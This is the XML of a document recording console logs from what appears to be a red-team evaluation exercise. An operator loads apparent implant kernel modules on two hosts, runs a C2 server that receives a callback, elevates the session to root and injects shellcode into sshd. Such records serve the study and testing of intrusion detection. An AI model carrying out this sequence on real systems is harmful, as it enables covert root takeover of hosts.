    <w:p w14:paraId="5243A8CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08AFE2D9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System information as of Tue May 14 10:09:38 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9E438C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78922BD8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System load: 2.88               Memory usage: 64%   Processes:       256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA90371" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Usage of /:  6.1% of 885.13GB   Swap usage:   1%    Users logged in: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F5D732" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524D8E80" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Graph this data and manage this system at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0460AF94" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    https://landscape.canonical.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C6389" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C33D0A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Your Hardware Enablement Stack (HWE) is supported until April 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740959EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Last login: Tue May 14 10:09:38 2019 from 128.55.12.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC1399" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ sudo insmod ./read_scan.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21188C1B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[sudo] password for admin: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3B223" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ sudo insmod ./load_helper.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F95C9BE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ lsmod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306986D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module                  Size  Used by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B66DA05" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">load_helper            16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C6CB95" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">read_scan              16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CDDD5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">netio_controller       16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5711E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">glx_alsa_675           16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405625AE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43F0538F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C27C7F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ ssh admin@128.55.12.126</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412F1563" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.126's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46545D8B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D956A86" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58246607" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B0219" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C2D9C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System information as of Tue May 14 10:12:19 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AE79D0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A83E69E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System load: 2.87               Memory usage: 63%   Processes:       249</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133353B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Usage of /:  7.0% of 885.13GB   Swap usage:   1%    Users logged in: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DFF9D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5693E215" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Graph this data and manage this system at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02551460" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    https://landscape.canonical.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB6B10" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C470389" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>147 packages can be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F4429" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>103 updates are security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C6A4E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FAFDFE5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Your Hardware Enablement Stack (HWE) is supported until April 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292D28B6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Last login: Tue May 14 10:12:19 2019 from 128.55.12.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447FA3C3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-3:~$ sudo insmod ./read_scan.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA3AEA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[sudo] password for admin:                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5673235C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A20601C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-3:~$ sudo insmod ./load_helper.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6713C3EC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-3:~$ lsmod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5025F3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module                  Size  Used by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CCC6BA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">load_helper            16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF09354" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">read_scan              16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50DB7A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">netio_controller       16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2800A89F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>netio                  20480  1 netio_controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C51924F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">glx_alsa_675           16384  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2066C388" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_n12i8uxxehxb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="103" w:name="_Toc12600054"/>
      <w:bookmarkEnd w:id="102"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="2168024A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C881B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/projects/drakon-apt/oc2$ sudo python ocMain.py --http 8105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6E48A0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[sudo] password for kududyn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE513A5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F5B9D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DA5220" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D8964" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC8D27" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8105  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A200A79" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3EC728" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="156B2579" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A894190" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [linux] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA50A68" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new linux console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8CEA21" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [L1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FEF696" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7446C968" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA990CB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362498E2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        L1        128.55.12.167:54136 --&gt;   128.55.12.167:8105  [HTTP]  Tue May 14 10:18:22 2019        active 35s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3509E77A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con L1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5801F0D6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D812073" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-trace-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6CC65" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C18C2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 1003 admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156E8AB1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCB7554" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] /home/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460E6DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;elevate test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048593D7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Elevate current process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138553A2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] elevate success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE62DFD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F2F55" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 0 root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47A36D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26555461" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3292E787" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8FB29" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] 16808          1                 root                    (sshd)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61583AEB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D94036" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79810E3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L1&gt;inject sc /e5/stage1/bin/stage1.linux.x64 16808</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670C23F5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] inject success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CC5A20" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AA5B96" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03885ACB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210FD44C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [linux] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77502413" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new linux console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5884DD25" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [L2] ####################</w:t>
      </w:r>
    </w:p>
